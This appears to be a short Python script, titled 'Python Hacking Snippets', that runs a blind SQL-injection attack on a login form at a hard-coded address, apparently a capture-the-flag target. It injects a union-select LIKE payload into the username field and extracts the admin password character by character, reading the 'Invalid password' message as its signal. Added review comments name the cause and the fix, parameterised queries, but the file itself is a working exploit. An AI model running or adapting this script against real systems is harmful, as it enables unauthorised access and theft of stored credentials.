# !/usr/bin/python3
import requests
import timeit
# Reference point for the wall-clock duration printed at the end of the run.
start = timeit.default_timer()

# Login endpoint every request is POSTed to.
URL = "http://35.227.24.107:5001/b3838cbb72/login"

# Fixed head of the string sent in the username field. The caller appends the
# characters matched so far, one candidate character and the closing
# `%";--` to complete the LIKE pattern.
QUERY = "admin' union select password from admins where id=1 and password like \""

# Candidate alphabet, tried in this order: lowercase ASCII letters, then digits.
# NOTE(review): a stored value containing any other character cannot be
# matched past that position with this alphabet.
CHARS = list("abcdefghijklmnopqrstuvwxyz0123456789")
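def send(name):
    """POST the login form to ``URL`` with *name* in the ``username`` field.

    The ``password`` field always carries the fixed filler ``'thisIs'``; only
    the username differs between calls.

    Args:
        name: String placed in the ``username`` form field.

    Returns:
        The ``requests.Response`` object for the POST.

    Raises:
        requests.exceptions.RequestException: If the connection fails or no
            response arrives within the timeout.
    """
    form = {'username': name, 'password': 'thisIs'}
    # requests has no default timeout: without one, a server that stops
    # answering would block this call (and the whole script) indefinitely.
    return requests.post(URL, data=form, timeout=10)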
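def check(value):
    """Report whether the response body contains ``'Invalid password'``.

    The script treats that message as the "condition was true" signal: it is
    the only part of the response that is inspected.

    Args:
        value: Response-like object exposing the body as a ``text`` string.

    Returns:
        ``True`` if ``'Invalid password'`` occurs in ``value.text``,
        otherwise ``False``.
    """
    # The membership test already yields a bool; no if/else wrapper is needed.
    return 'Invalid password' in value.text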
print("Start Bruteforcing Parameter")

# Character-by-character recovery driven by a one-bit signal: each request
# extends the known prefix by one candidate, and check() reports whether the
# response contained 'Invalid password'.
# NOTE(review): the server side is not visible here. Presumably the login
# handler concatenates the username into its SQL and answers differently
# depending on whether a row is returned. Binding the username as a query
# parameter and returning one generic failure message would remove the signal
# this loop relies on. Confirm against the application code.
# NOTE(review): there is no upper bound on len(word). The loop ends only when
# a full pass over CHARS produces no match.
word = ""
restart = True
while restart:
    for candidate in CHARS:
        probe = QUERY + word + candidate + "%\";--"
        if check(send(probe)):
            # Prefix confirmed: keep the character and start a new pass.
            word += candidate
            break
    else:
        # Every candidate was rejected, so the prefix cannot be extended.
        restart = False

stop = timeit.default_timer()
print("Found: " + word)
elapsed = stop - start
print('Time %.2f seconds' % elapsed)
Last active
March 14, 2019 18:16
Python Hacking Snippets